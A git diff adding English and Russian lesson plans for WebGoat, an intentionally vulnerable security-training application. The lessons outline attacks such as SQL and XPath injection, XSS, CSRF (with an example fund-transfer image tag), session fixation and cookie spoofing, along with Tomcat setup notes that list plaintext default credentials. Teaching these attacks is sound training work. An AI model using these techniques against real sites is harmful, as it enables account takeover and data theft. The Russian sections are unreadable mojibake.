Lesson Plan Title: Same Origin Policy Protection
+
Concept / Topic To Teach:
+
+A key element of AJAX is the XMLHttpRequest (XHR), which allows javascript to make asynchronous
+calls from the client side to a server. However, as a security measure these requests may
+only be made to the server from which the client page originated.
+
+General Goal(s):
+This exercise demonstrates the Same Origin Policy Protection. XHR requests
+can only be passed back to the originating server. Attempts to pass data to
+a non-originating server will fail.";
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/SessionFixation.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/SessionFixation.html
new file mode 100644
index 000000000..c7e70f3aa
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/SessionFixation.html
@@ -0,0 +1,33 @@
+
+
Lesson Plan Title: Session Fixation
+
Concept / Topic To Teach:
+How to steal a session with a 'Session Fixation'
+
+
+How the attacks works:
+
+A user is recognized by the server by an unique Session ID. If a
+user has logged in and is authorized he does not have to
+reauthorize when he revisits the application as the user is recognized
+by the Session ID. In some applications it is possible to deliver
+the Session ID in the Get-Request. Here is where the attack starts.
+
+An attacker can send a hyperlink to a victim with a chosen Session ID.
+This can be done for example by a prepared mail which looks like an
+official mail from the application administrator.
+If the victim clicks on the link and logs in he is authorized
+by the Session ID the attacker has chosen. The attacker
+can visit the page with the same ID and is recognized as the victim and
+gets logged in without authorization.
+
General Goal(s):
+
+This lesson has several stages. You play the attacker but also the victim.
+After having done this lesson it should be understood how
+a Session Fixation in general works. It should be also understood that
+it is a bad idea to use the Get-Request for Session IDs.
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/SilentTransactions.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/SilentTransactions.html
new file mode 100644
index 000000000..d3377dce8
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/SilentTransactions.html
@@ -0,0 +1,24 @@
+
+
Lesson Plan Title: How to Perform Silent Transactions Attacks.
+
Concept / Topic To Teach:
+This lesson teaches how to perform silent transactions attacks.
+
+
+How the attacks works:
+
+Any system that silently processes transactions using a single submission is dangerous to the client.
+For example, if a normal web application allows a simple URL submission, a preset session attack will
+allow the attacker to complete a transaction without the user’s authorization.
+In Ajax, it gets worse: the transaction is silent; it happens with no user feedback on the page,
+so an injected attack script may be able to steal money from the client without authorization.
+
General Goal(s):
+
+* This is a sample internet banking application - money transfer page.
+
Lesson Plan Title: How to Create a SOAP Request
+
Concept / Topic To Teach:
+
+Web Services communicate through the use of SOAP requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL). Let's learn something about WSDL files. Check out WebGoat's web service description language (WSDL) file.
+General Goal(s):
+Try connecting to the WSDL with a browser or Web Service tool. The URL for the web service is: http://localhost/WebGoat/services/SoapRequest The WSDL can usually be viewed by adding a ?WSDL on the end of the web service request.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/SqlNumericInjection.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/SqlNumericInjection.html
new file mode 100644
index 000000000..a081c1a29
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/SqlNumericInjection.html
@@ -0,0 +1,14 @@
+
+
Lesson Plan Title: How to Perform Numeric SQL Injection
+
Concept / Topic To Teach:
+
+SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack.
+General Goal(s):
+The form below allows a user to view weather data. Try to inject an SQL string that results in all the weather data being displayed.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/SqlStringInjection.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/SqlStringInjection.html
new file mode 100644
index 000000000..2dc84b697
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/SqlStringInjection.html
@@ -0,0 +1,14 @@
+
+
Lesson Plan Title: How to Perform String SQL Injection
+
Concept / Topic To Teach:
+
+SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack.
+General Goal(s):
+The form below allows a user to view their credit card numbers. Try to inject an SQL string that results in all the credit card numbers being displayed. Try the user name of 'Smith'.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/StoredXss.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/StoredXss.html
new file mode 100644
index 000000000..e2662164f
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/StoredXss.html
@@ -0,0 +1,9 @@
+
+
Lesson Plan Title: How to Perform Stored Cross Site Scripting (XSS)
+
Concept / Topic To Teach:
+
+It is always a good practice to scrub all input, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere in the application. Users should not be able to create message content that could cause another user to load an undesireable page or undesireable content when the user's message is retrieved.
+
+General Goal(s):
+The user should be able to add message content that cause another user to load an undesireable page or content.
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/ThreadSafetyProblem.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/ThreadSafetyProblem.html
new file mode 100644
index 000000000..1b01a915d
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/ThreadSafetyProblem.html
@@ -0,0 +1,22 @@
+
+
+
+
+ Lesson Plan
+
+
+
+
+
Lesson Plan Title: How to Exploit Thread Safety Problems
+
Concept / Topic To Teach:
+
+ Web applications can handle many HTTP requests simultaneously. Developers often use variables that are not thread safe. Thread safety means that the fields of an object or class always maintain a valid state when used concurrently by multiple threads. It is often possible to exploit a concurrency bug by loading the same page as another user at the exact same time. Because all threads share the same method area, and the method area is where all class variables are stored, multiple threads can attempt to use the same class variables concurrently. General Goal(s):
+The user should be able to exploit the concurrency error in the web application and view login information for another user that is attempting the same function at the same time. This will require the use of two browsers .
+How To Configure Tomcat Introduction
+WebGoat comes with default configurations for Tomcat. This page will explain these configurations
+and other possible configurations for Tomcat. This is just
+a short description which should be enough in most cases. For more advanced tasks please
+refer to the Tomcat documentation. Please note that all solutions
+are written for the standard configurations on port 80. If you use another port you have
+to adjust the solution to your configuration.
+
+The Standard Configurations
+There are two standard Tomcat configurations. In the basic configurations you use the server on your localhost.
+ Both are identically with the only difference
+ that in one tomcat is running on port 80 and 443 (SSL) and in the other tomcat is running on port 8080 and 8443. In Linux you have
+ to start WebGoat as root or with sudo if you want to run it on port 80 and
+ 443.
+ As running software as root is dangerous we strongly advice to use
+the port 8080 and 8443. In Windows you can
+run WebGoat.bat to run it on port 80 and WebGoat_8080.bat to run it on port 8080. In Linux you
+can use webgoat.sh and run it with webgoat.sh start80 or webgoat.sh start8080. The user in these
+configurations is guest with password guest
+
+
+Server Configurations
+
+If you are a single user of WebGoat the standard configurations should be
+enough but if you want to use WebGoat in laboratory or in class there
+might be the need to change the configurations. Before changing
+the configurations we recommend doing a backup of the files you change.
+
+
+Change Ports
+
+To change the ports open the server_80.xml which you find in tomcat/conf and change the
+non-SSL port. If you want to use it on port 8079 for example:
+
+
+
+ <!-- Define a non-SSL HTTP/1.1 Connector on port 8079 -->
+ <Connector address="127.0.0.1" port="8079"...
+
+
+You can also change the SSL connector to another port of course.
+In this example to port 8442:
+
+
+ <!-- Define a SSL HTTP/1.1 Connector on port 8442 -->
+ <Connector address="127.0.0.1" port="8442"...
+
+Make WebGoat Reachable From Another Client
+THIS MAKES IT POSSIBLE TO REALLY ATTACK YOUR SERVER! DO NOT DO THIS
+ UNTIL YOU KNOW WHAT YOU ARE DOING. THIS CONFIGURATION SHOULD BE ONLY USED IN
+SAFE NETWORKS!
+By its default configurations WebGoat is only
+reachable within the localhost. In a laboratory or a class
+there is maybe the need of having a server and a few clients.
+In this case it is possible to make WebGoat reachable.
+
+The reason why WebGoat is only reachable within the localhost is
+the parameter address in the connectors for the non-SSL and SSL connection in server_80.xml. It is set
+to 127.0.0.1. The applications only listens on the port of this address for
+incoming connections if it is set. If you remove this parameter the server listens on all IPs on the
+specific port.
+
+Permit Only Certain Clients Connection
+
+If you have made WebGoat reachable it is reachable for
+all clients. If you want to make it reachable only for certain clients specified
+by there IP you can archive this by using a 'Remote Address Filter'.
+The filter can be set in a whitebox or blackbox approach. Here is
+only discussed the whitebox approach. You have to add following lines to the Host section of web_80.xml:
+
+
+ <Valve className="org.apache.catalina.valves.RemoteAddrValve"
+ allow="127.0.0.1,ip1,ip2"/>
+
+In this case only localhost, ip1 and ip2 are permitted to connect.
+
+WebGoat Default Users and Roles for Tomcat
+
+WebGoat requires the following users and roles to be configured in order for the application to run.
+
+ >role rolename="webgoat_basic"/<
+ >role rolename="webgoat_admin"/<
+ >role rolename="webgoat_user"/<
+ >user username="webgoat" password="webgoat" roles="webgoat_admin"/<
+ >user username="basic" password="basic" roles="webgoat_user,webgoat_basic"/<
+ >user username="guest" password="guest" roles="webgoat_user"/<
+
+
+Adding Users
+
+Usually using WebGoat you just use the user guest with the password guest.
+But maybe in laboratory you have made a setup with one server and a lot of
+clients. In this case you might want to have a user for every client
+ and you have to alter tomcat-users.xml
+in tomcat/conf as the users are stored there. We recommend not to use real passwords
+as the passwords are stored in plain text in this file!
+
+Add User
+
+Adding a user is straight forward. You can use the guest entry as an example. The added
+users should have the same role as the guest user. Add lines like this to the file:
+
+
+ <user name="student1" password="password1" roles="webgoat_user"/>
+ <user name="student2" password="password2" roles="webgoat_user"/>
+ ...
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/TraceXSS.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/TraceXSS.html
new file mode 100644
index 000000000..2358d4fc4
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/TraceXSS.html
@@ -0,0 +1,9 @@
+
+
Lesson Plan Title: How to Perform Cross Site Tracing (XST) Attacks
+
Concept / Topic To Teach:
+
+It is always a good practice to scrub all input, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere in the application. Users should not be able to create message content that could cause another user to load an undesireable page or undesireable content when the user's message is retrieved.
+General Goal(s):
+Tomcat is configured to support the HTTP TRACE command. Your goal is to perform a Cross Site Tracing (XST) attack.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/UncheckedEmail.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/UncheckedEmail.html
new file mode 100644
index 000000000..db3c630e9
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/UncheckedEmail.html
@@ -0,0 +1,9 @@
+
+
Lesson Plan Title: How to Exploit Unchecked Email
+
Concept / Topic To Teach:
+
+It is always a good practice to validate all inputs. Most sites allow non-authenticated users to send email to a 'friend'. This is a great mechanism for spammers to send out email using your corporate mail server.
+
+General Goal(s):
+The user should be able to send and obnoxious email message.
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/UsefulTools.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/UsefulTools.html
new file mode 100644
index 000000000..e69db2dce
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/UsefulTools.html
@@ -0,0 +1,44 @@
+
+
+Useful Tools
+
+Below is a list of tools we've found useful in solving the WebGoat lessons. You will need WebScarab or Paros to solve most of the lessons.
+WebScarab:
+
+Like WebGoat, WebScarab is a part of OWASP.
+WebScarab is a proxy for analyzing applications that
+communicate using the HTTP and HTTPS protocols. Because WebScarab
+operates as an intercepting proxy, we can review and modify requests
+and responses.http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
+
+Firebug:
+
+Firebug is an add-on for the Firefox browser. We can use it to inspect, edit and monitor CSS, HTML and JavaScript.http://www.getfirebug.com
+
IEWatch:
+
+IEWatch is a tool to analyze HTTP and HTML for users of the Internet Explorer.http://www.iewatch.com
+
+Wireshark
+
+Wireshark is a network protocol analyzer. You can sniff network traffic and gather useful
+informations this way.http://www.wireshark.org
+
+
+
+Scanner:
+
+There are many vulnerability scanners for your own web applications. They can find XSS, Injection Flaws and other vulnerabilities. Below are links to two open source scanner. http://www.nessus.org http://www.parosproxy.org
+
+
+
Lesson Plan Title: How to Perform WSDL Scanning
+
Concept / Topic To Teach:
+
+Web Services communicate through the use of SOAP requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL) file.
+General Goal(s):
+This screen is the API for a web service. Check the WSDL file for this web service and try to get some customer credit numbers.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/WeakAuthenticationCookie.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/WeakAuthenticationCookie.html
new file mode 100644
index 000000000..9c9b86c8a
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/WeakAuthenticationCookie.html
@@ -0,0 +1,12 @@
+
+
Lesson Plan Title: How to Spoof an Authentication Cookie
+
Concept / Topic To Teach:
+
+Many applications will automatically log a user into their site if the right authentication cookie is specified. Some times the cookie values can be guessed if the algorithm for generating the cookie can be obtained. Some times the cookies are left on the client machine and can be stolen by exploiting another system vulnerability. Some times the cookies maybe intercepted using Cross site scripting. This lesson tries to make the student aware of authentication cookies and presents the student with a way to defeat the cookie authentication method in this lesson.General Goal(s):
+
+ The user should be able to bypass the authentication check.
+Login using the webgoat/webgoat account to see what happens. You may also try aspect/aspect. When you understand the authentication cookie, try changing your identity to alice.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/WeakSessionID.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/WeakSessionID.html
new file mode 100644
index 000000000..45157e0b5
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/WeakSessionID.html
@@ -0,0 +1,9 @@
+
+
Lesson Plan Title: How to Hijack a Session
+
Concept / Topic To Teach:
+
+Application developers who develop their own session IDs frequently forget to incorporate the complexity and randomness necessary for security. If the user specific session ID is not complex and random, then the application is highly susceptible to session-based brute force attacks.
+General Goal(s):
+Try to access an authenticated session belonging to someone else.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/WelcomeScreeen.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/WelcomeScreeen.html
new file mode 100644
index 000000000..be93e40e2
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/WelcomeScreeen.html
@@ -0,0 +1,16 @@
+
+
Lesson Plan Title:Welcome
+
Concept / Topic To Teach:
+This lesson presents the basics for understanding the transfer of data between the browser and the web application.
+Standards Addressed:
+General Goal(s):
+Specific Objectives:
+Required Materials:
+Anticipatory Set (Lead-In):
+Step-By-Step Procedures:
+Plan For Independent Practice:
+Closure (Reflect Anticipatory Set):
+Assessment Based On Objectives:
+Extensions (For Gifted Students):
+Possible Connections To Other Subjects:
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/WsSAXInjection.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/WsSAXInjection.html
new file mode 100644
index 000000000..23a2e8607
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/WsSAXInjection.html
@@ -0,0 +1,12 @@
+
+
Lesson Plan Title: How to Perform Web Service SAX Injection
+
Concept / Topic To Teach:
+
+Web Services communicate through the use of SOAP requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL) file.
+General Goal(s):
+Some web interfaces make use of Web Services in the background. If the frontend relies on the web service for all input validation, it may be possible to corrupt the XML that the web interface sends.
+
+
Lesson Plan Title: How to Perform Web Service SQL Injection
+
Concept / Topic To Teach:
+
+Web Services communicate through the use of SOAP requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL) file.
+General Goal(s):
+Check the web service description language (WSDL) file and try to obtain multiple customer credit card numbers. You will not see the results returned to this screen. When you believe you have suceeded, refresh the page and look for the 'green star'.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/XMLInjection.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/XMLInjection.html
new file mode 100644
index 000000000..fc9c73697
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/XMLInjection.html
@@ -0,0 +1,19 @@
+
+
Lesson Plan Title: How to Perform XML Injection Attacks.
+
Concept / Topic To Teach:
+ This lesson teaches how to perform XML Injection attacks.
+
+
+How the attacks works:
+
+AJAX applications use XML to exchange information with the server. This XML can be easily intercepted and altered by a malicious attacker.
+
+
General Goal(s):
+
+WebGoat-Miles Reward Miles shows all the rewards available. Once you've entered your account ID, the lesson will show you your balance and the products you can afford. Your goal is to try to add more rewards to your allowed set of rewards. Your account ID is 836239.
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/XPATHInjection.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/XPATHInjection.html
new file mode 100644
index 000000000..926d8f151
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/XPATHInjection.html
@@ -0,0 +1,22 @@
+
+
Lesson Plan Title: How to Perform XPATH Injection Attacks.
+
Concept / Topic To Teach:
+ This lesson teaches how to perform XPath Injection attacks.
+
+
+How the attacks works:
+
+Similar to SQL Injection, XPATH Injection attacks occur when a web site uses user supplied information to query XML data. By sending intentionally malformed information into the web site, an attacker can find out how the XML data is structured or access data that they may not normally have access to.
+They may even be able to elevate their privileges on the web site if the xml data is being used for authentication (such as an xml based user file).
+
+Querying XML is done with XPath, a type of simple descriptive statement that allows the xml query to locate a piece of information. Like SQL you can specify certain attributes to find and patterns to match. When using XML for a web site it is common to accept some form of input on the query string to identify the content to locate and display on the page. This input must be sanitized to verify that it doesn't mess up the XPath query and return the wrong data.
+
+
+
General Goal(s):
+
+The form below allows employees to see all their personal data including their salaries. Your account is Mike/test123. Your goal is to try to see other employees data as well.
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/AccessControlMatrix.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/AccessControlMatrix.html
new file mode 100644
index 000000000..e45d57ddf
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/AccessControlMatrix.html
@@ -0,0 +1,16 @@
+
+
Название Ńрока: ĐŃпользование матрицы контроля Đ´ĐľŃŃ‚Ńпа
+
Тема для изŃчения:
+
+Đ’ Ńхемах ĐľŃнованных на ролях ŃĐ°ĐĽĐ° роль предŃтавляет из Ńебя набор разреŃений Đ´ĐľŃŃ‚Ńпа и привилегий.
+Пользователю одновременно может быть приŃвоена одна или более ролей.
+Подобные Ńхемы чаще вŃего включают в Ńебя два механизма: механизм работы Ń Ń€Đ°Đ·Ń€ĐµŃениями Đ´ĐľŃŃ‚Ńпа и
+механизм назначения привилегий. Đ’ ŃĐ»Ńчаях когда реализация данной Ńхемы имеет какие-Ń‚Đľ изъяны пользователь может полŃчить
+Đ´ĐľŃŃ‚ŃĐż Đş Ń„ŃнкционалŃ, Đş ĐşĐľŃ‚ĐľŃ€ĐľĐĽŃ ĐµĐĽŃ ĐľĐ±Ń€Đ°Ń‰Đ°Ń‚ŃŚŃŃŹ не разреŃено. Đли он может каким-либо образом повыŃить Ńвои
+привилегии в приложении.
+ĐžŃновные цели и задачи:
+Каждый пользователь имеет Ńвою роль(и), наличие которой позволяет ĐµĐĽŃ ĐżĐľĐ»Ńчать Đ´ĐľŃŃ‚ŃĐż Đş Ńтрого определённым реŃŃŃ€ŃĐ°ĐĽ.
+Đ’Đ°Ńей целью являетŃŃŹ изŃчение механизма разграничения Đ´ĐľŃŃ‚Ńпа на данном Ńайте и поиŃĐş в нём изъянов.
+Только пользователи из грŃппы [Admin] должны иметь Đ´ĐľŃŃ‚ŃĐż Đş Ń€Đ°Đ·Đ´ĐµĐ»Ń Ńправления аккаŃнтами.
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/BackDoors.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/BackDoors.html
new file mode 100644
index 000000000..0769f43b2
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/BackDoors.html
@@ -0,0 +1,23 @@
+
+
Название Ńрока: Как ĐľŃŃщеŃтвляетŃŃŹ помещение вредоноŃных конŃŃ‚Ń€Ńкций в Đ‘Đ”.
+
Тема для изŃчения:
+Помещение вредоноŃных конŃŃ‚Ń€Ńкций в Đ‘Đ”
+
+
+Как работает данный вид атаки:
+
+Đ‘Đ°Đ·Đ° данных обычно иŃпользŃетŃŃŹ как backend веб-приложений в качеŃтве хранилища важных данных. Đ’ процеŃŃе атаки злоŃĐĽŃ‹Ńленник
+может помещать в неё различные вредоноŃные конŃŃ‚Ń€Ńкции, например опаŃные триггеры. Триггеры вызываютŃŃŹ
+каждый раз при выполнении базой определённой операции (выборка, вŃтавка, обновление данных и Ń‚.Đ´.). Например Đ°Ń‚Đ°ĐşŃющий
+может Ńоздать триггер который бŃдет Ń Đ˛Ńех региŃтрирŃющихŃŃŹ пользователей менять почтовые адреŃĐ° на подконтрольный ĐµĐĽŃ email.
+
ĐžŃновная цель(и):
+
+* Đ’Ń‹ должны понять как Ń ĐżĐľĐĽĐľŃ‰ŃŚŃŽ ŃŤĐşŃплŃатации Ńязвимого запроŃĐ° Ńоздать триггер
+* ĐŁ Đ˛Đ°Ń Đ˝Đµ полŃчитŃŃŹ Ńоздать в данном приложении наŃтоящий вредоноŃный триггер Ń‚.Đş. Đ‘Đ” иŃпользŃемая WebGoat`ом не поддерживает триггеров.
+* Đ’Đ°Ń ID для входа - 101.
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/BasicAuthentication.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/BasicAuthentication.html
new file mode 100644
index 000000000..fe1d9afeb
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/BasicAuthentication.html
@@ -0,0 +1,16 @@
+
+
Название Ńрока: ĐžŃновная Đ°Ńтентификация
+
Тема для изŃчения:
+
+ĐžŃновная Đ°Ńтентификация иŃпользŃетŃŃŹ для защиты реŃŃŃ€Ńов раŃположенных на Ńтороне Ńервера.
+При полŃчении запроŃĐ° от пользователя веб-Ńервер отправляет ĐµĐĽŃ ĐľŃ‚Đ˛ĐµŃ‚ Ń ĐşĐľĐ´ĐľĐĽ 401.
+ПолŃчив его браŃзер запраŃивает Ń ĐżĐľĐ»ŃŚĐ·ĐľĐ˛Đ°Ń‚ĐµĐ»ŃŹ логин и пароль в Ńпециальном диалоговом окне. ПоŃле
+ввода браŃзер кодирŃет полŃченные данные по Đ°Đ»ĐłĐľŃ€Đ¸Ń‚ĐĽŃ base64 и отŃылает веб-ŃерверŃ.
+ПоŃледний, в Ńвою очередь, проверяет полŃченнŃŃŽ информацию и, еŃли вŃŃ‘ правильно, отдаёт ĐşĐ»Đ¸ĐµĐ˝Ń‚Ń Đ·Đ°ĐżŃ€Đ°Ńиваемый
+докŃмент. Указанные пользователем данные далее автоматичеŃки отŃылаютŃŃŹ браŃзером при каждом обращении Đş
+защищённым реŃŃŃ€ŃĐ°ĐĽ.
+
+ĐžŃновная цель(и):
+На этом Ńроке ваŃей целью являетŃŃŹ понимание механизмов ĐľŃновной Đ°Ńтентификации и ответ на вопроŃŃ‹ которые находятŃŃŹ ниже.
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/BlindSqlInjection.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/BlindSqlInjection.html
new file mode 100644
index 000000000..629a396cc
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/BlindSqlInjection.html
@@ -0,0 +1,25 @@
+
+
Название темы: ĐŃпользование Ńлепых SQL-инъекций
+
Тема для изŃчения:
+
+SQL-инъекции предŃтавляют ŃерьёзнŃŃŽ опаŃноŃŃ‚ŃŚ для Ńайтов, чья работа ĐľŃновываетŃŃŹ на Đ‘Đ”.
+Методы ĐľŃŃщеŃтвления таких Đ°Ń‚Đ°Đş очень проŃŃ‚Ń‹ в ĐľŃвоении и Ńщерб наноŃимый ими нельзя недооценивать Ń‚.Đş. злоŃĐĽŃ‹Ńленник
+Ń Đ¸Ń… помощью в некоторых ŃĐ»Ńчаях может добитьŃŃŹ полной компрометации ŃиŃтемы.
+НеŃмотря на вŃŃŽ опаŃноŃŃ‚ŃŚ SQL-инъекций каждый день появляетŃŃŹ множеŃтво Ńязвимых Đş ним веб-приложений.
+Главная цель(и):
+Форма, раŃположенная ниже, позволяет пользователю вводить номер аккаŃнта и проверять дейŃтвителен он или нет.
+Đ’ĐľŃпользŃйтеŃŃŚ данной формой для того чтоб через ŃязвимоŃŃ‚ŃŚ на Ńтороне Ńервера полŃчить
+возможноŃŃ‚ŃŚ извлекать произвольные данные из Đ‘Đ”.
+
+
Название Ńрока: ĐĐşŃплŃатация ŃязвимоŃтей переполнения бŃффера
+
Тема для изŃчения:
+Как проводить ŃŤĐşŃплŃатацию ŃязвимоŃтей переполнения бŃффера.
+ĐžŃновные цели и задачи:
+Для данного Ńрока требŃетŃŃŹ автор.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/CSRF.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/CSRF.html
new file mode 100644
index 000000000..47e23b65e
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/CSRF.html
@@ -0,0 +1,40 @@
+
+
Название Ńрока: Проведение Đ°Ń‚Đ°Đş межŃайтовой подделки запроŃов.
+
Тема для изŃчения:
+На данном Ńроке вы наŃчитеŃŃŚ иŃпользовать ŃязвимоŃти межŃайтовой подделки запроŃов (CSRF).
+
+
+Как работает данный тип атак:
+
+При проведении Đ°Ń‚Đ°Đş межŃайтовой подделки запроŃов Đ¶ĐµŃ€Ń‚Đ˛Ń Đ·Đ°Ńтавляют каким-либо образом
+загрŃзить ŃŃ‚Ń€Đ°Đ˝Đ¸Ń†Ń ŃодержащŃŃŽ опаŃĐ˝ŃŃŽ картинкŃ, типа той что предŃтавлена ниже:
+
+
<img src="http://www.mybank.com/sendFunds.do?acctId=123456 "/>
+
+Когда браŃзер жертвы обрабатывает Ń‚Đ°ĐşŃŃŽ ŃтраницŃ, он автоматичеŃки ŃоверŃает обращение
+Đş ŃĐ°ĐąŃ‚Ń www.mybank.com, Đş ŃĐşŃ€Đ¸ĐżŃ‚Ń transferFunds.do передавая необходимый злоŃĐĽŃ‹ŃĐ»ĐµĐ˝Đ˝Đ¸ĐşŃ ĐżĐ°Ń€Đ°ĐĽĐµŃ‚Ń€.
+БраŃзер бŃдет Đ´ŃĐĽĐ°Ń‚ŃŚ что ŃŤŃ‚Đľ проŃтое изображение, тогда как на Ńамом деле обращение Đş этомŃ
+адреŃŃ Đ˛Ń‹Đ·ĐľĐ˛ĐµŃ‚ перевод денег.
+
+ВмеŃте Ń Đ·Đ°ĐżŃ€ĐľŃом, Ńходящим на Ńайт банка, бŃĐ´ŃŃ‚ переданы и cookies клиента. Следовательно,
+еŃли в этот момент пользователь бŃдет авторизирован на www.mybank.com, и в его cookies бŃдет хранитŃŃŹ
+идентификатор активной ŃеŃŃии, Ńкрипт transferFunds.do примет этот Đ·Đ°ĐżŃ€ĐľŃ Đ·Đ° легитимный и
+ŃоверŃит необходимŃŃŽ злоŃĐĽŃ‹ŃĐ»ĐµĐ˝Đ˝Đ¸ĐşŃ ĐľĐżĐµŃ€Đ°Ń†Đ¸ŃŽ.
+
+Таким образом, Đ°Ń‚Đ°ĐşŃющий может производить практичеŃки вŃе дейŃтвия, которые ŃпоŃобен делать
+наŃтоящий пользователь.
+
ĐžŃновные цели и задачи:
+
+Đ’Đ°ŃĐ° цель - поŃлать в новоŃŃ‚Đ˝ŃŃŽ грŃĐżĐżŃ ĐżĐ¸ŃŃŚĐĽĐľ, Ńодержащее в Ńебе изображение ŃĐľ
+Ńпециально Ńформированным адреŃом. Картинка должна иметь размер 1*1px и производить
+CSRF-Đ°Ń‚Đ°ĐşŃ, Đ·Đ°Ńтавляя браŃзер обращатьŃŃŹ Đş текŃщей Ńтранице, но Ń Đ´ĐľĐżĐľĐ»Đ˝Đ¸Ń‚ĐµĐ»ŃŚĐ˝Ń‹ĐĽ параметром
+в URL - "transferFunds=4000". Когда вы отоŃлёте Ńообщение и оно отобразитŃŃŹ на экране,
+браŃзер автоматичеŃки ĐľŃŃщеŃтвит необходимый запроŃ. Как только вы реŃили что выполнили ŃŤŃ‚Đľ задание
+проŃŃ‚Đľ обновите ŃтраницŃ. Đ•Ńли вŃŃ‘ Ńделано верно, Ń‚Đľ в главном меню, на против ŃоответŃтвŃющего Ńрока,
+появитŃŃŹ зелёная отметка.
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/ChallengeScreen.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/ChallengeScreen.html
new file mode 100644
index 000000000..b3d9b3321
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/ChallengeScreen.html
@@ -0,0 +1,7 @@
+
+
Lesson Plan Title: Putting it all together
+
Concept / Topic To Teach:
+This lesson creates a challenge that will help the student apply all that they have learned.General Goal(s):
+
Название Ńрока: Фильтрация данных на Ńтороне клиента
+
Тема для изŃчения:
+
+Đ’Ńегда ŃчитаетŃŃŹ хороŃей практикой отправлять на ŃŃ‚ĐľŃ€ĐľĐ˝Ń ĐşĐ»Đ¸ĐµĐ˝Ń‚Đ° только Ń‚Ń Đ¸Đ˝Ń„ĐľŃ€ĐĽĐ°Ń†Đ¸ŃŽ, Đ´ĐľŃŃ‚ŃĐż Đş которой он имеет.
